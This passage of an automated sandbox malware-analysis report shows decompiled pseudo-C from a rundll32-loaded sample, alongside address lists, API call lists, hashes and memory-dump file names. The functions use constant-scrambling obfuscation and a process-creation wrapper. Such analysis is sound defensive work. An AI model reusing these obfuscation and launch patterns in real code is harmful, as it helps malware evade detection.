                                                                                                                      0x0068fdac
                                                                                                                      0x0068fdb4
                                                                                                                      0x0068fdbc
                                                                                                                      0x0068fdc4
                                                                                                                      0x0068fdcc
                                                                                                                      0x0068fdd4
                                                                                                                      0x0068fddc
                                                                                                                      0x0068fde0
                                                                                                                      0x0068fdf2
                                                                                                                      0x0068ffd1
                                                                                                                      0x0068ffd5
                                                                                                                      0x0068ffd6
                                                                                                                      0x0068ffd7
                                                                                                                      0x0068ffd8
                                                                                                                      0x0068ffd9
                                                                                                                      0x0068ffe8
                                                                                                                      0x0068ffe9
                                                                                                                      0x0068fff3
                                                                                                                      0x0068fff3
                                                                                                                      0x0068fff7
                                                                                                                      0x00690000
                                                                                                                      0x00690000
                                                                                                                      0x0068fdfe
                                                                                                                      0x0068ff5e
                                                                                                                      0x0068ff60
                                                                                                                      0x0068ff64
                                                                                                                      0x0068ff99
                                                                                                                      0x0068ff99
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068ff66
                                                                                                                      0x0068ff66
                                                                                                                      0x0068ff66
                                                                                                                      0x0068ff6a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068ff6c
                                                                                                                      0x0068ff81
                                                                                                                      0x0068ff81
                                                                                                                      0x0068ff84
                                                                                                                      0x0068ff87
                                                                                                                      0x0068ff8a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068ff75
                                                                                                                      0x0068ff79
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068ff7b
                                                                                                                      0x0068ff7e
                                                                                                                      0x0068ff7e
                                                                                                                      0x0068ff7e
                                                                                                                      0x0068ff8c
                                                                                                                      0x0068ff8c
                                                                                                                      0x0068ff8e
                                                                                                                      0x0068ff91
                                                                                                                      0x0068ff91
                                                                                                                      0x0068ff94
                                                                                                                      0x0068ff94
                                                                                                                      0x00000000
                                                                                                                      0x0068ff66
                                                                                                                      0x0068fe0a
                                                                                                                      0x0068ff52
                                                                                                                      0x0068ff54
                                                                                                                      0x00000000
                                                                                                                      0x0068ff54
                                                                                                                      0x0068fe16
                                                                                                                      0x0068fe8f
                                                                                                                      0x0068fe9a
                                                                                                                      0x0068fe9e
                                                                                                                      0x0068fead
                                                                                                                      0x0068feae
                                                                                                                      0x0068fecf
                                                                                                                      0x0068fed4
                                                                                                                      0x0068fee0
                                                                                                                      0x0068ff22
                                                                                                                      0x0068ff2e
                                                                                                                      0x0068ff37
                                                                                                                      0x0068ff3c
                                                                                                                      0x0068ff3f
                                                                                                                      0x00000000
                                                                                                                      0x0068ff3f
                                                                                                                      0x0068fe18
                                                                                                                      0x0068fe1e
                                                                                                                      0x0068fe24
                                                                                                                      0x0068fe2d
                                                                                                                      0x0068fe5e
                                                                                                                      0x0068fe6a
                                                                                                                      0x0068fe74
                                                                                                                      0x0068fe7c
                                                                                                                      0x0068fe82
                                                                                                                      0x0068fe87
                                                                                                                      0x0068fe87
                                                                                                                      0x0068ffc3
                                                                                                                      0x0068ffc9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068ffcf
                                                                                                                      0x0068ffb7
                                                                                                                      0x0068ffbd
                                                                                                                      0x0068ffbe
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                      • API String ID: 1514166925-3316477785
                                                                                                                      • Opcode ID: 3562b1b7ee831dc5338ef42fb802357a477fd48f4fe694197a832d0eec97edce
                                                                                                                      • Instruction ID: f66ccce56fa6f67d836530f66ef75ff0af5622f1ef135dfe3eccb3d0f90f729a
                                                                                                                      • Opcode Fuzzy Hash: 3562b1b7ee831dc5338ef42fb802357a477fd48f4fe694197a832d0eec97edce
                                                                                                                      • Instruction Fuzzy Hash: 6F0220725083808FD368DF25C58AA5BFBE2BBC5718F108A1DF29986260D7B58909CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068E991 Relevance: 2.6, Strings: 2, Instructions: 68COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 267 68e991-68ea60 268 68ea90-68ea96 267->268 269 68ea62-68ea77 call 68f8fd 267->269 269->268 272 68ea79-68ea88 call 6893ed 269->272 274 68ea8d 272->274 274->268
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x6a320c = _a4;
					if(E0068F8FD() != 0) {
						E006893ED(); // executed
					}
				}
				return 1;
			}
















                                                                                                                      0x0068e997
                                                                                                                      0x0068e99d
                                                                                                                      0x0068e9a4
                                                                                                                      0x0068e9ab
                                                                                                                      0x0068e9b2
                                                                                                                      0x0068e9b9
                                                                                                                      0x0068e9c0
                                                                                                                      0x0068e9c7
                                                                                                                      0x0068e9d3
                                                                                                                      0x0068e9d8
                                                                                                                      0x0068e9dd
                                                                                                                      0x0068e9e1
                                                                                                                      0x0068e9e8
                                                                                                                      0x0068e9ef
                                                                                                                      0x0068e9f6
                                                                                                                      0x0068e9fd
                                                                                                                      0x0068ea02
                                                                                                                      0x0068ea07
                                                                                                                      0x0068ea0e
                                                                                                                      0x0068ea15
                                                                                                                      0x0068ea19
                                                                                                                      0x0068ea1a
                                                                                                                      0x0068ea1d
                                                                                                                      0x0068ea24
                                                                                                                      0x0068ea2f
                                                                                                                      0x0068ea32
                                                                                                                      0x0068ea39
                                                                                                                      0x0068ea40
                                                                                                                      0x0068ea47
                                                                                                                      0x0068ea53
                                                                                                                      0x0068ea56
                                                                                                                      0x0068ea5d
                                                                                                                      0x0068ea5d
                                                                                                                      0x0068ea60
                                                                                                                      0x0068ea65
                                                                                                                      0x0068ea77
                                                                                                                      0x0068ea88
                                                                                                                      0x0068ea8d
                                                                                                                      0x0068ea77
                                                                                                                      0x0068ea96

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID: ].u$d,
                                                                                                                      • API String ID: 621844428-1507873175
                                                                                                                      • Opcode ID: 0df557825779708a2557ad697d612d148ebbab9498a02927856f9017dad73459
                                                                                                                      • Instruction ID: 6c2c886440244011c91e533b1599dcf7a2f1a099c6970a7466d3911a928caa72
                                                                                                                      • Opcode Fuzzy Hash: 0df557825779708a2557ad697d612d148ebbab9498a02927856f9017dad73459
                                                                                                                      • Instruction Fuzzy Hash: 433106B1D00209EBDB08DFA4C98A5DEBFF1FB55304F208199D510BB250D7B45B859F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068AB87 Relevance: 1.4, Strings: 1, Instructions: 154COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 288 68ab87-68ad94 call 6920b9 call 684b61 call 687f5d 294 68ad99-68ad9e 288->294 295 68addd 294->295 296 68ada0-68ada2 294->296 297 68addf-68ade5 295->297 298 68adb0-68addb call 691e67 * 2 296->298 299 68ada4-68adaa 296->299 300 68adab-68adae 298->300 299->300 300->297
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E0068AB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E006920B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E00684B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E00687F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E00691E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E00691E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}













                                                                                                                      0x0068ab88
                                                                                                                      0x0068ab94
                                                                                                                      0x0068ab97
                                                                                                                      0x0068ab9a
                                                                                                                      0x0068ab9d
                                                                                                                      0x0068ab9f
                                                                                                                      0x0068aba2
                                                                                                                      0x0068aba3
                                                                                                                      0x0068aba6
                                                                                                                      0x0068abaa
                                                                                                                      0x0068abab
                                                                                                                      0x0068abb0
                                                                                                                      0x0068abb6
                                                                                                                      0x0068abbd
                                                                                                                      0x0068abc4
                                                                                                                      0x0068abcb
                                                                                                                      0x0068abd2
                                                                                                                      0x0068abd6
                                                                                                                      0x0068abdd
                                                                                                                      0x0068abe4
                                                                                                                      0x0068abeb
                                                                                                                      0x0068abf2
                                                                                                                      0x0068abf9
                                                                                                                      0x0068ac00
                                                                                                                      0x0068ac09
                                                                                                                      0x0068ac0e
                                                                                                                      0x0068ac13
                                                                                                                      0x0068ac1a
                                                                                                                      0x0068ac21
                                                                                                                      0x0068ac28
                                                                                                                      0x0068ac2f
                                                                                                                      0x0068ac36
                                                                                                                      0x0068ac3d
                                                                                                                      0x0068ac44
                                                                                                                      0x0068ac4b
                                                                                                                      0x0068ac52
                                                                                                                      0x0068ac59
                                                                                                                      0x0068ac60
                                                                                                                      0x0068ac67
                                                                                                                      0x0068ac6e
                                                                                                                      0x0068ac75
                                                                                                                      0x0068ac79
                                                                                                                      0x0068ac80
                                                                                                                      0x0068ac87
                                                                                                                      0x0068ac8e
                                                                                                                      0x0068ac91
                                                                                                                      0x0068ac98
                                                                                                                      0x0068ac9f
                                                                                                                      0x0068aca3
                                                                                                                      0x0068acaa
                                                                                                                      0x0068acb1
                                                                                                                      0x0068acb8
                                                                                                                      0x0068acbc
                                                                                                                      0x0068acc3
                                                                                                                      0x0068acca
                                                                                                                      0x0068accd
                                                                                                                      0x0068acd4
                                                                                                                      0x0068acdb
                                                                                                                      0x0068ace2
                                                                                                                      0x0068ace9
                                                                                                                      0x0068aced
                                                                                                                      0x0068acf4
                                                                                                                      0x0068acfb
                                                                                                                      0x0068ad05
                                                                                                                      0x0068ad08
                                                                                                                      0x0068ad0b
                                                                                                                      0x0068ad16
                                                                                                                      0x0068ad19
                                                                                                                      0x0068ad20
                                                                                                                      0x0068ad2c
                                                                                                                      0x0068ad31
                                                                                                                      0x0068ad31
                                                                                                                      0x0068ad34
                                                                                                                      0x0068ad37
                                                                                                                      0x0068ad3e
                                                                                                                      0x0068ad45
                                                                                                                      0x0068ad4c
                                                                                                                      0x0068ad50
                                                                                                                      0x0068ad57
                                                                                                                      0x0068ad5a
                                                                                                                      0x0068ad5f
                                                                                                                      0x0068ad62
                                                                                                                      0x0068ad6a
                                                                                                                      0x0068ad6d
                                                                                                                      0x0068ad74
                                                                                                                      0x0068ad94
                                                                                                                      0x0068ad9e
                                                                                                                      0x0068addd
                                                                                                                      0x0068ada0
                                                                                                                      0x0068ada2
                                                                                                                      0x0068adbf
                                                                                                                      0x0068add3
                                                                                                                      0x0068ada4
                                                                                                                      0x0068ada7
                                                                                                                      0x0068ada8
                                                                                                                      0x0068ada9
                                                                                                                      0x0068adaa
                                                                                                                      0x0068adaa
                                                                                                                      0x0068adad
                                                                                                                      0x0068adad
                                                                                                                      0x0068ade5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: nJQ
                                                                                                                      • API String ID: 963392458-2884827605
                                                                                                                      • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                      • Instruction ID: ff624fbe9920c2629ab99dbfa1ee3e4b2646eaa36d5b5032a01f25ff072302eb
                                                                                                                      • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                      • Instruction Fuzzy Hash: FA71F27240028CEBCF59DFA4C9498CE3BA6FF48358F108219FE1696220D3B6C969DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(009789A8), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(009789A8), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

